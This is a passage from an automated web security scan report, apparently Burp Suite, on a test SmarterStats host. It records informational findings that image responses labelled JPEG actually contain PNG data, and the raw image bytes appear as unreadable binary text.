l..y..f..8............. .... .@$.....e...i....r>K..Vn.-.:....i.....iv....@....@ .L8...Y.]...V.}.v.....@.....&0....@+.i.%.............K...m.....@....@`:.m.%.....6%.......z.....O.._|...=@.....=@................Z..]..xI..8.<.%(.......=+.>...    tg.N`;...........{.
....-..'.[..qX.{ ..]..E.#...{....[.W.y[..w...}... ..Z.'N.}..3..>...    L4...J`.K.......O.{fz...=.>...dO`...b.8%>..{.O.._&.>...tr!..6...l..T..W.......b.e...`_M'.bO`....&.I.<x%>..{.O.._&.>...tr!..6...l..T..W.......b.e...`_M'.bO`....&.I.<x%>..{.O.._&.>...tr!..6...l..T..W.......b.e...`_M'.bO`....&.I.<x%>..{.O.._&.>...tr!..6...l..T..W.......b.e...`_M'.bO`....&.I.<x%>..{.O.._&.>...tr!..6...l..T..W.......b.e...`_M'.bO`....&.I.<x%>..{.O.._&.>...tr!..6...l..T..W.......b.e...`_M'.bO`....&.I.<x%>..{.O.._&.>...tr!..6...l..T..W.......b.e...`_M'.bO`....&.I.<x%>..{.O.._&.>...tr!..6...l..T..W.......b.e...`_M'.bO`....&.I.<x%>..{.O.._&.>...tr!..6...l..T..W.......b.e...`_M'.bO`....&.I.<x%>..{.O.._&.>...tr!..6...l..T..W.......b.e...`_M'.bO`....&.I.<x%>..{.O.._&.>...tr!..6...l..T..W.......b.e...`_M'.bO`.....>....C.<.....`.....1+....@%...Yq..    l.m...../....h...1.x......}.........'@`..]...s`.6.lR+5U......}..c.. .I....8...Vj..E.;]......'@`..]..m...h..&.RS.,Z......=.>...dO`..#.Mj...Y.......{.}..6....~!..E..6...*f..N..>...    ..${W`...x.6.lR+5U......}..c.. .I....8...Vj..E.;]......'@`..].....[.A`.Z..b.-.t.....{...M......-. .I..T1..w....c..O`...|.f..z...b.s^,.W....[S:t...q..y.k....X.L..,Z......=.>.)...e...i......8.?...E*.......}...cV\..gs`.6.l=.f"wa..N$.>...    L1.........Xv..............<...m...t.4.....G.}..c...``+.l.,.i./.^.f..l......;)ggg....Fy..9J0..........s..wx.M....@].\^^.....z4..V....{k.%..v.N    l.~....O...m..fl..O......N....{.}...a.{I..N.vg...D...K...-..x.k`.....Y...c..O`..m...R.H[....~...?L......{..k.-ZX+.C`..0.....w"...c..O`....L.o.......T....9 E......q..Ek.gv...7.....    .Sl#..k......[.A`......'N.$.....{...M.w....a-. .I..T1..w....c..O..&.....H`.Z..b.-.t.....{...M.w.......h..&.RS.,Z......=.>...d.
l?..[.A`.Z..b.-.t.....{...M......-. .I..T1..w....c..O..&........m...Vj..E.;]......'@`..    l]p$.I..T1..w....c..O..&.......GS.A`.Z..b.-.t.....{...M.'.u...&.RS.,Z......=.>...d.
lo.;l...Mj...Y.......{.}..6....~..>.....JM..hy...?.....l.=.....6...*f..N..>...    ..${W`.....m...Vj..E.;]......'@`..m..=9....6...*f..N..>...    ..${W`........JM..hy...?.....l.=.....6...*f..N..>...    ..${W`....H.6.lR+5U......}..c.. .I.....9.E..6...*f..N..>...    ..${W`{s.l...Mj...Y.......{.}..6............JM..hy...?.....l..+.}.k...Mj...Y.......{.}..6.......[.A`.Z..b.-.t.....{.@..v....|......{6[..y....`.l..[.A`...C^..............~(....}..v...yZ...v..b...E.%..+.}_.k...-n..}e<q.-z...?.k.{c?..i..>L`[..........\......m..N{.i..<qzg..?....B....A7;m..^.=.....W9........q..Ek..Cg....=.>. .-.@.5.^.}$..h..V.Am..hy..?....B...{k7.....#p......G.[....+a..m..>>.>...    X.[    d...=869....kp......N...-j..],Z...rD.O.......y............j*.[..    l.<..}_.8......{.}.!.[.....\...y.-. ...P.U,Z.Y....=.>.k`.....K......(......-. .Ex..s,Z.8.:..>...    X.......u.....OQ....w.u..cW..a{C.k....X.L..,Z......=.>.)......?h....7..H...=....cV\...s`.6.l=.f"wa..N$.>...    .    l...&.-...n.[9..]...C....[`{"..`....c.q..-.<.....{.@..6.g.^....    ..[.|.z`...gR\...9.E...>.3...hy...?........?K....}.........Mro...<.(.......r]c:p.q..o...z........As..A.v..._..?Kt......7..M.%.....).`....o...2x'..?....B..........[.#.......{.....zI......[....]X.......{.}..R`.?.T...u9.E......q..Ek..Cg....=.>.k`..sk&.............l..E.;o......'`l.~l..\/..........`.q....?.....l..+.=.w..v..Vj..E.;]......'`l.....eh........,..`..vb.4|w.-.......{..5.mO^>. ....HE..q....9.E....3...hy'..?....B......G    nWo.....5....H`...C^..............~(....}..vu=..K...v...Q.
l.?}!E...1:..9x.....>...    ..lm..-.+.}G.l...-..x.k`.....Y...c..O D`....F^
%....    l....\...8..6..Mg..}s..5..W.5._......p..V3.m.....7.}..c......?.v..D    l.q...Z5....V..
..c_o.VbO`.z.....O^H..;lR+5U...w....c..O..&.....H`.Z..b.-.t.....{...M.w..o.;l...Mj...Y.......{.}..6........J...Mj...Y.......{.}..6.....G...JM..hy...?.....l..+.}s.a.6.lR+5U......}..c.. .I.....9....6...*f..N..>...    ..${W`........JM..hy...?.....l.=.....6...*f..N..>...    ..${W`...?.....JM..hy...?.....l..+.}C.l...Mj...Y.......{.}..6....^..[.A`.Z..b.-.t.....{...M.....>.^.l...Vj..E.;]......'@`..]...sX.6.lR+5U......}..c.. .I....u9.E..6...*f..N..>...    ..${[`[...l...Vj..E.;]......'@`..].........JM..hy...?.....l.=.....6...*f..N..>...    ..${W`..?.`.6.lR+5U......}..c.. .I....59.E..6...*f..N..>...    ..${.[..    lR+5U......}..c.. .I......_). .I..T1..w....c..O..&.....H`.Z..b.-.t.....{..$..EZ.gi6[.......X.O.......W...h..v.[..}.-.\.....{.....*.-..?..2.g...l..^..wJ.;r{.Y...?..-. ..h....E.;.......'0.....................W...m...t.4.....G.}..c...z`+.j.e.O+.l..-./V;q.n......T..M.<...%..&..h.\....k....oz.....z...r..wg..E8..K.Z`;...v.^..9.....Eh.q..].q.....?.......v-...sJ/.~E.k...-..x.k`......u.....oN..b`.!..~.......?F...G_.v....r=...3......H.}..c...``;_to..~k.._.nv.Ny..c..
l_.{..h..v.[..}.-.\.....{..........8....<..X...
..N.c.. .I........m...Vj..E.;]......'@`..].....|.6.lR+5U......}..c.. .I....8...Vj..E.;]......'@`..]..K..[.A`.Z..b.-.t.....{...M.w../...S.A`.Z..b.-.t.....{...M.'.u...&.RS.,Z......=.>...d.
l..;l...Mj...Y.......{.}..6....^.;.H...Mj...Y.......{.}..6.....G...JM..hy...?.....l..+.}q.a.6.lR+5U......}..c.. .I....E....m...Vj..E.;]......'@`..    l]p$.I..T1..w....c..O..&........h..&.RS.,Z......=.>...do.l...[.A`.Z..b.-.t.....{...M.w../.a-. .I..T1..w....c..O..&....+~...m...Vj..E.;]......'@`..    l]p$.I..T1..w....c..O..&........h..&.RS.,Z......=.>...do.l...[.A`.Z..b.-.t.....{...M.w....a-. .I..T1..w....c..O..&.....H`.Z..b.-.t.....{...M.w.....s). .I..T1..w....c..O..&........m...Vj..E.;]......'@`..    l]p$.I..T1..w....c..O..&.....<.l.6.lR+5U......}..c.. .I.....9.E..6...*f..N..>...    ..${.[..    lR+5U......}..c.. .I....Y..l.6.lR+5U......}..c.. .I.....9.E..6...*f..N..>...    ..${.[..    lR+5U......}..c.. .I.......l.6.lR+5U......}..c.. .I...v.l.F....o........b.-.......{...m%p....l....E.. .u..o`K.} E.%D.._.E...m....P.wL..9....'......E:_G....S...
l.....h.w`{.+S
6.l.=...y.....h..............]..U....j:.[..{..w..R..7.=......cO....e).8v.....>!.8v.....L......G....c.^........../S.:.]{......v......g_..+../.l..o;..
l..w......]..R.qJ`{...N.F    ...JX{.....r]}.J`..._.n..:.U..._}.r.k;.U......p.\W.....y.#.F..c_%..m.o.F..>_%...W.    7.u..E`.......,.pv}<.......g`@.....=@...7...O>9h>$.m8..$:..7|0..f.\.^:..r.|0.O&.....(O>....=......<-f.....g.9..(.F..a.k..}..p5..gy...?Ul..cO`[    ....p....@....@........q...... ...... .........@....8,@`.;.@....@..........!.... ....6z.....a..|=.s_..........|s.f~...Z..r....2.._c
..a..?.|y..~l.........6V.r.j........o.R}R
..V.90.....k.~..%..._...UH^.O#..._.b....N`.>....v.......|.@y.$...'.o...?....p..........4..].........Z    m]`S>..v.w.....7.......r j.
\=a..y.}........r..Yv.xIt.v..,..?..K..t.?...FlCN%
.m.......n@...(.a{.........(;n.......oN.4...r.."...T....}.?.a.2.{.t...w~.g......    ..._.d.._.....D    l.u.g.Z..6.h....un.U.....Z..:v.*......|..z%...a.6#\.].e..zk......ki......o.......;....-......k{..X=.y.@....@..J..[%.e. .... ..X.....9... .... P)@`.......@.....K..6.4.A....@...*..l.p.!.... ...c    .....<. .... .@......2..@....@`,...X......@...... .U.Q.... .....%@`.K.. .... .......J8..@....@.....lcIs...@....@.R..V    G... .... 0....[.i."_......IEND.B`.

10.16. http://vulnerable.smarterstats.6.0.host:9999/Temp/356d07443f3445d88a06bf724a953c85.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/356d07443f3445d88a06bf724a953c85.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/356d07443f3445d88a06bf724a953c85.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=Webmaster
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:59:33 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682F8B4CAA00"
Content-Type: image/jpeg
Content-Length: 10168
Connection: Close

.PNG
.
...IHDR...l............    ....sRGB.........gAMA......a....    pHYs..........o.d..'MIDATx^..[..YU..0!&j..1$D3Qc.E.....Qf...bDqp...Pq.T<..t<.r......|*<Ab....D.0.....W...o..W..wUwU.....{....de.....~.]..WW..._.... ...@...    ./..... ...@....@...     ...@....@p.....1=.@...... .ac.@...... ....0l..bz.... ...@....... ...@...    `..... ...@.......=...@..............A...... ...........5]...4...1_._..]..o    kmIO... ...@.......a;J.Kc.f...i~.......g....[......C>. ...@.....L...n.z.vf......j..w=~.v.R[......@..........a[-.r.........a[=~.a...7l.z.....@...... .a.....S........|k|...H_..W..........{`...W..U...R.mu.V.........T.....z.9./..KE.@...........g7i........mo:X{|..m.M....o:..s.....F....Q.v~,..3....5i..B.<...J=.m.:.l..q.g.,.    2.c=0l5.N...O....e...X..    =..8^........#Oqb.-..\..b..9n..1...6...zpp..r.N.1...z..x,....cP...R....N...,.?vw<./..a...t....t.c...1(...=.c9F'....x=.#....g$.........0..'....i..0..'....i....6...d.......'..9.c.C..j.C.vHg..BMW..y...<#y..M..4...    .<.=..M...    .<.=..M.(......$c.4\.vU>...iH...BMW..:.C:...j..........30lr...88L....!Gl..=L....!Gl.@....$.&....:...    7tNC.X..j........=.P...G.-.-.H..a.#6..a.%OF.9b...a.%OF.9b..J=0l&)4..6..].O..s.R.:.P.........1....=.l1lyF......i.....y2z....@...y2z....P..a3I.I..i....|....:.1....=tl.tF.!.t5..g.a.3.g`...M.pp.p...C..4.z.p...C..4.R...I
M2.M.uhW..n......!.t5..c;.3z....A.<[.[..<..&Gl.....K...r......K...r....z`.LRh.1l..C.*.pC.4..u....A...!..c.5]z..b......69b....&\.d..#6..&\.d..#6....f.B..a.p..U...:.!u.c.5]z......C..j.#....g$.........0..'....i..0..'....i....6...d.......'..9.c.C..j.C.vHg..BMW..y...<#y..M..4...    .<.=..M...    .<.=..M.(......$c.4\.vU>...iH...BMW..:.C:...j..........30lr...88L....!Gl..=L....!Gl.@....$.&....:...    7tNC.X..j........=.P...G.-.-.H..a.#6..a.%OF.9b...a.%OF.9b..J=&o....4..N...............>.S...#T...O..+a.5i..B.<....Q.v~,..3..a;^..|.N..qZ.gi....g...........+..x^..a+.T1..."......R......`(.(.T1E...3l'...![.U;......c}.d.`.J(..Q>..."%.Q.v~,..3....5i..B.<.i......../....]0hG../.n3l.4gWmI.]r.2l.....=.[x......z:.......1>SOG.....V.......G......+.1..<<<\...+z.kGo......6...f.x..!.a..`.Li..o.O:N..m....../......?..[.....K./...a.5i..B.<....Q.v~,..3..a.q........\..].y......]....M[1.=*...
=
ULA.....R.1m...]....O..x....y[.{t.....V..R.xN..?.....S...-.s..{.......u.x...CM...=l...J=&o..../....a.......~g....m...+...of.j.a...F.5a[...Rg+...m........u....c...F..o.*....l....K...j....a...V..aS.W...a...|9E.[...$Eyp.ff.f.6^.l.P...G../u.R...Z.........V.y0l>H....y.e.R{M..c..
ULQ..a.(...Z......S....6......V.:l.....&l...6^.l...6.z..[..yg.....`.p...T.Zy.W\.7l5a....*.T1E.......o....~^.6..T......Y...:.=..m....K......V...........a+.<... U.V.....[M..c..
ULQ..a.(d....v.-j`.|.Syp.ff.f.6^.l.P...G../u.R...Z...-o.n..[....l.n.|.*V+.......&....W..*.(...U.2......[....6......V.:l.....&l...6^.l...6.z..[...vg.....`.p...T.Zy.W\.7l5a....*.T1E.......o.^.....a.mN.......u.x...CM...=l...J=0lj.
...a{..:..40l....6........2.a.    .`,.U...)J=0l...x..[.Y...6..T......Y...:.=..m....K......V......f.....`.p...T.Zy.W\.7l5a....*.T1E.......o.~.._JQ........73[5...Rg.....?z.x...z`.....oy....a.........R.j.A^q.....]0....R.......BF.a.j..ya.|.Syp.ff.f.6^.l.P...G../u.R...Z...-o.^../...a+.<... U.V.....[M..c..
ULQ..a.(d....f......9...of.j.a...F.5a[...Rg+.....+.....E..R.........R.j.A^q.....]0....R.......BF.a.j..ya.|.Syp.ff.f.6^.l.P...G../u.R...Z...-o.^.....a+.<... U.V.....[M..c..
ULQ..a.(d..._....a.mN.......u.x...CM...=l...J=0lj.
...a.j..ya.
6.7l>H....y.ep.V.v.X...H.S.zL......lv..E:>..x1...|.ztS.]9..s{..a....E.[n.\.....73[5...Rg.....?z.x...zL.../.|6O+?vt0K.G.\...R.....b~.sM.]9...vGS.......[.......b.. ...n.j....}U..b.R.i...vm..YC....?/m.....%...a....E.[.....<8|3.U.../u6z.    ......:[...[o....m..K...Z.......kW...U.......]..\;zC....E.~~..0^.}.s.....S..*S8y...sk.K...Z..v..-o.^.....n.|O{...|3.U.../u6z.    ......:[.....K..7i.$z.e{C.+.Y...6...<8|3.U.../u6z.    ......:[.......RZ..m>~.....pM..7...X./..-o.......a+.<..(....l....K...j....a...V.1m..+....k?....9zc.z.....V.    r.M
..s...a{.]_LQ....9........V.:l.....&l...6^.l...7lFu..7)l....`@:.m.i...Lk%...73[5...Rg.....?z.x...z`.6..>.mQ....;G[|.....[....v......V.:l.....&l...6^.l..M..%...>.....O.P.m...a..w~1E..ok*....l....K...j....a...V...........W.......4b.|.Syp.ff.f.6^.l.P...G../u.R........o....S7B.........50l...<8|3.U.../u6z.    ......:[.GC........y..N^.Uo....!.j..ya.|.@yp.ff.f.6^.l.P...G../u.R...Mn_...a..3FQ........73[5...Rg.....?z.x...z44l..yv.q..j....4l....LQ........73[5...Rg.....?z.x...z40l.!;.e...{..Q5.(.1l.M#...C...of.j.a...F.5a[...Rg+.h`.V...M......=..a...6...<8|3.U.../u6z.    ......:[.GC....?.....u.-h`.|{Xyp.ff.f.6^.l.P...G../u.R...mu.v.K.g..S7B.......E..ow*....l....K...j....a...V.....q._.....:..50l...<8|3.U.../u6z.    ......:[...M.^A.........[...$Eyp.ff.f.6^.l.P...G../u.R.....].3^.Uo..o.......a..........u.x...CM...=l...J=...s...np.>....iy....a...6...<8|3.U.../u6z.    ......:[...M.^A.........50l............u.x...CM...=l...J=0lj.
.c...F.[..... U.V.....XGM....#..f.R..[M%w....=..a...6..T......Y...:.=..m....K......V..K...o.B.........R.j.A^q.....]0....R........=.w0l.M#..w.(....l....K...j....a...V.....q._.....7!E..o/+....l....K...j....a...V..aS.W.....4b.
6./.. U.V.....K.5a....*.T1E........ji.....E..os*....l....K...j....a...V..aS.W...a...?R....l.n.|.*V+.......&....W..*.(..2..x1O...k.-.<.-c.8.*........a.n.1l..s..+....l....K...j....a...V.q5...".{s.2l.?.~_.qZ....g..c}.`w.4l?...E.[.......b.. ...n.j....}U..b.R.+`.N.........![.U;..^.]9..K.IS.......[.....<8|3.U.../u6z.    ......:[....5.......-...J..&.4.......a.....E...!zFg..F?..L...>.9.....)...)..a._../..'......ly.....En.|O{...|3.U.../u6z.    ......:[.......Vo0.o.xI.d.....o..[.............u.x...CM...=l...J=&m.6.Y.s.........`-gWmI..;...Owf-j`.|G......V.:l.....&l...6^.l..W..u.m.h.....=.+..xn.`...F.[n.\.....73[5...Rg.....?z.x...z\..V...b..>........=......a.m,.......u.x...CM...=l...J=0l..u....m.....-.zC....E..oW(....l....K...j....a...V..aS.W.....4b.
6.%)...73[5...Rg.....?z.x...z`.....oi.....R....l....R.j.A^q........b_.@......VQ.]Ca...F..os*....l....K...j....a...V..aS.W...a..;.KQ..V.y.a.A.X.<.+........b_.@......VQ..7lO..[....6......V.:l.....&l...6^.l...6.z..[..E5k..0l....6........2.a.    .`,.U...)J=0l...x....>E..os*....l....K...j....a...V..aS.W....Ot.-j`.
6.7l>H....y.ep.V.v.X...H.S.z`.*
.......E..os*....l....K...j....a...V..aS.W.......a.........R.j.A^q.....]0....R.......BF.a..3kQ........73[5...Rg.....?z.x...z`.....oy.....E.[.......b.. ...n.j....}U..b.R..[E!#..=...a...6..T......Y...:.=..m....K......V........Z....l.n.|.*V+.......&....W..*.(...U.2.[T...........73[5...Rg.....?z.x...z`.....oy..c..7E.[.......b.. ...n.j....}U..b.R..[E!#..=.3lQ........73[5...Rg.....?z.x...z`.....oy.........l.n.|.*V+.......&....W..*.(...U.2.......5J.?..~)z..f....zXGM....#..f.z....K...-._....-.Y..e1l.c......._....zXGM....#..f.z....K.G..$.5_.....    ..7E.a...S
..6..Yy..ff.f.6^.l.P...G.</.[..<....4...?>;...a.=.8.}...F...........J=0lc.5._K.....-j...?<+...a...X+Q......Y...:.=..m..#.k...8-..4...|q|...b...ud.r...dhi....R.0....)...a.=...{.r.....cl..~...7v.R.I....:8:..x...yZz........M....nm{.....;v..m.i4......40l.#Qy..ff.f.6^.l.P...G.<.I...........m[......c}</AJ-......a2l.}FJA..V.,...A..7v5z.M...=|...V.qu.[.6_t.i..X::8..;U..1[.X._m.....1......7D.......~~%L..h......d............{`l...w5.....m..e...a{lg......#OI)hp..;...b...V.:l.....&l...y^.7l...e/w.....Y.2..9Z.....[.0...?9...a..D.ep....]..c...C......zL..m1kKq6.?J..7#l:..7.....-..cg45l....a2l..1...a......73[5...Rg.....?z.yM.....}...G{...t.Gs..l.....N-.    R.Q!.$ii......a2l.|RJA...?..a.1.Y.7....c.G.Q.....6lCD:^,N?.cH........a..&...'..40l....*.......u.x...CM...=..0l.....X.~n[..h.-......5L...OH)h`.|O..r.....cl..~...7v.R....j..a.n.M..}...40l...k%...73[5...Rg.....?z.ya.....-..w7lQ.d............ .....=.&....>~cW+.......~-......5L..=.I)h`..<).a.A.V+.!    .}.5..I;?.z..a..........d............ .....=.&....>~cW+.......~-.#....5L..].L)h`..<).a.A.V+.!    ..[M...b_..a..........d..zDJA...{
q....]..c...C......z`..Vk@.........a2l.|xJA..6.I.....Z.I8mn.j..0..*...g$.hi.....MQ.d............ .....=.&....>~cW+.......~.....d........m....6.4a....p.....;`,.U...-.H.....@w..5L..m.N)h`.|O!.r.....cl..~...7v.R....j.....Eg............m....6.4a....p.....;`,.U...-.H....=.3kQ.d...])....).A..7v5z.M...=|...V..a.[...Z...u.-j...[.3...a.......MX...$.67l5....}...a.3.g45l....a2lo.......... .....=.&....>~cW+.......~-..wf-j.....K)h`..<).a.A.V+.!    ..[M...b_..a.....-.C;..5L.....R.....B..>~cW...D}....o.j..........a....NQ.d........m....6.4a....p.....;`,.U...-.H..a.n.M....H)h`.|O!.r.....cl..~...7v.R....j....=..a..&...oI)h.......R.(...]w]..%..;Gy..=........c.G.Q.......J....a..?.;E.a...S
...v.._..Fo&K.z.v.....~~-...y.......c.G.Q.......Jb.L..d.n.............a1l...R.....=.7$..l....K...y...<#yF.......S.0...oL)hX....<?E.a.........w.....o.j......R...O.Q.1l.M......R
............}...S.....-.7$..l....K...y...<.....<.f.e....u-......a2l...........7..a1l.y.3S.....M[.....7v5z.M..O......Y..".g..h..qZ......4l......a2l...........OKQ.b.>......a..z.oH....Y...:.=..1lyFE........?_.....4......R....?...)jX....pC....mq..S.(9.....N..d..q..S.(Y..nz@..%.x.....G.:..Q.O..Hj]0hG.ivpr...ji.....E.a{....4,......)jX.....>E.a...=:E..L.|.f...........7k......~~%_.Y..S...~~%_.Y{..ca.._./.[...1s....0..l[.y....;. `..`.......=..w.u..=..s.V....}|It.._k....ul'..c.._?......=.&....y~..<....7....Y...>..O...<.u...=.CA.}..:.'z.g..T..a.Q....1..h...@......    `.&(*K... ...@`Z.0l....@...... 0A...    ... ...@..........d5.... ...L...m...YR...V.....|...?.=......w....i.cEf.f...................~....../.....7.][..
...=]C...v^)...6%.+......$..a.0...h).X.P2..T.}3..N.P.8sk......oH......s..&...\......gV....|O..p^..:*....J..;..fm.....L..l.}.`.=z.......[C....Fm........x..3.M.....a..`z>p....W`.._. +..a.8...5Nc.r..~CZ^..O...~/...>}y3u...>..x.X[....    <.On=....fm...r..........g|EF..a............i[.....m.s_g/........k&m_.q.J..?...)...:..|.3l.....t=Y......a..mRf.d.....O........7.._...[........J.n.......s.$.....w..eb.JI..!...m"fm............6=...s.7....Y...==..r..........%......a....^.....X......s..uLF.....c=..v.....-.~.q.3.......1l5(3.. ...@...p...9.Q
..@......j........... ...@.A....G). ...@....A..V.2c@...... ............. ...@....[.....@........0l.x.B...... ....0l5(3.. ...@...p...9.Q
..@......j........... ...@.A....G). ...@....A..V.2c@...... ............. ...@.......x...[.....IEND.B`.

10.17. http://vulnerable.smarterstats.6.0.host:9999/Temp/3a06471f3515434aa5438ccdb1d520e8.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/3a06471f3515434aa5438ccdb1d520e8.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/3a06471f3515434aa5438ccdb1d520e8.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=Webmaster
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:59:33 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682F8B4CAA00"
Content-Type: image/jpeg
Content-Length: 7526
Connection: Close

.PNG
.
...IHDR...l............    ....sRGB.........gAMA......a....    pHYs..........o.d....IDATx^....4.].....?@...#..Xf.....f.FX26.c6...........%.Yd6.Y..P......|...-.......&..Lu.;......_...........O...Q.L...... .... .@h.;....C....@....H.6.....@......@`.>A\... .... @`...@....@..........!.... ....6z....@......@`.>A\... .... @`...@....@..........!.... ....
l..y..f..8............. .... .@$.....e...i....r>K..Vn.-.:....i.....iv....@....@ .L8...Y.]...V.}.v.....@.....&0....@+.i.%.............K...m.....@....@`:.m.%.....6%.......z.....O.._|...=@.....=@................Z..]..xI..8.<.%(.......=+.>...    tg.N`;...........{.
....-..'.[..qX.{ ..]..E.#...{....[.W.y[..w...}... ..Z.'N.}..3..>...    L4...J`.K.......O.{fz...=.>...dO`...b.8%>..{.O.._&.>...tr!..6...l..T..W.......b.e...`_M'.bO`....&.I.<x%>..{.O.._&.>...tr!..6...l..T..W.......b.e...`_M'.bO`....&.I.<x%>..{.O.._&.>...tr!..6...l..T..W.......b.e...`_M'.bO`....&.I.<x%>..{.O.._&.>...tr!..6...l..T..W.......b.e...`_M'.bO`....&.I.<x%>..{.O.._&.>...tr!..6...l..T..W.......b.e...`_M'.bO`....&.I.<x%>..{.O.._&.>...tr!..6...l..T..W.......b.e...`_M'.bO`....&.I.<x%>..{.O.._&.>...tr!..6...l..T..W.......b.e...`_M'.bO`....&.I.<x%>..{.O.._&.>...tr!..6...l..T..W.......b.e...`_M'.bO`....&.I.<x%>..{.O.._&.>...tr!..6...l..T..W.......b.e...`_M'.bO`....&.I.<x%>..{.O.._&.>...tr!..6...l..T..W.......b.e...`_M'.bO`....&.I.<x%>..{.O.._&.>...tr!..6...l..T..W.......b.e...`_M'.bO`.....>....C.<.....`.....1+....@%...Yq..    l.m...../....h...1.x......}.........'@`..]...s`.6.lR+5U......}..c.. .I....8...Vj..E.;]......'@`..]..m...h..&.RS.,Z......=.>...dO`..#.Mj...Y.......{.}..6....~!..E..6...*f..N..>...    ..${W`...x.6.lR+5U......}..c.. .I....8...Vj..E.;]......'@`..].....[.A`.Z..b.-.t.....{...M......-. .I..T1..w....c..O`...|.f..z...b.s^,.W....[S:t...q..y.k....X.L..,Z......=.>.)...e...i......8.?...E*.......}...cV\..gs`.6.l=.f"wa..N$.>...    L1.........Xv..............<...m...t.4.....G.}..c...``+.l.,.i./.^.f..l......;)ggg....Fy..9J0..........s..wx.M....@].\^^.....z4..V....{k.%..v.N    l.~....O...m..fl..O......N....{.}...a.{I..N.vg...D...K...-..x.k`.....Y...c..O`..m...R.H[....~...?L......{..k.-ZX+.C`..0.....w"...c..O`....L.o.......T....9 E......q..Ek.gv...7.....    .Sl#..k......[.A`......'N.$.....{...M.w....a-. .I..T1..w....c..O..&.....H`.Z..b.-.t.....{...M.w.......h..&.RS.,Z......=.>...d.
l?..[.A`.Z..b.-.t.....{...M......-. .I..T1..w....c..O..&........m...Vj..E.;]......'@`..    l]p$.I..T1..w....c..O..&.......GS.A`.Z..b.-.t.....{...M.'.u...&.RS.,Z......=.>...d.
lo.;l...Mj...Y.......{.}..6....~..>.....JM..hy...?.....l.=.....6...*f..N..>...    ..${W`.....m...Vj..E.;]......'@`..m..=9....6...*f..N..>...    ..${W`........JM..hy...?.....l.=.....6...*f..N..>...    ..${W`....H.6.lR+5U......}..c.. .I.....9.E..6...*f..N..>...    ..${W`{s.l...Mj...Y.......{.}..6............JM..hy...?.....l..+.}.k...Mj...Y.......{.}..6.......[.A`.Z..b.-.t.....{.@..v....|......{6[..y....`.l..[.A`...C^..............~(....}..v...yZ...v..b...E.%..+.}_.k...-n..}e<q.-z...?.k.{c?..i..>L`[..........\......m..N{.i..<qzg..?....B....A7;m..^.=.....W9........q..Ek..Cg....=.>. .-.@.5.^.}$..h..V.Am..hy..?....B...{k7.....#p......G.[....+a..m..>>.>...    X.[    d...=869....kp......N...-j..],Z...rD.O.......y............j*.[..    l.<..}_.8......{.}.!.[.....\...y.-. ...P.U,Z.Y....=.>.k`.....K......(......-. .Ex..s,Z.8.:..>...    X.......u.....OQ....w.u..cW..a{C.k....X.L..,Z......=.>.)......?h....7..H...=....cV\...s`.6.l=.f"wa..N$.>...    .    l...&.-...n.[9..]...C....[`{"..`....c.q..-.<.....{.@..6.g.^....    ..[.|.z`...gR\...9.E...>.3...hy...?........?K....}.........Mro...<.(.......r]c:p.q..o...z........As..A.v..._..?Kt......7..M.%.....).`....o...2x'..?....B..........[.#.......{.....zI......[....]X.......{.}..R`.?.T...u9.E......q..Ek..Cg....=.>.k`..sk&.............l..E.;o......'`l.~l..\/..........`.q....?.....l..+.=.w..v..Vj..E.;]......'`l.....eh........,..`..vb.4|w.-.......{..5.mO^>. ....HE..q....9.E....3...hy'..?....B......G    nWo.....5....H`...C^..............~(....}..vu=..K...v...Q.
l.?}!E...1:..9x.....>...    ..lm..-.+.}G.l...-..x.k`.....Y...c..O D`....F^
%....    l....\...8..6..Mg..}s..5..W.5._......p..V3.m.....7.}..c......?.v..D    l.q...Z5....V..
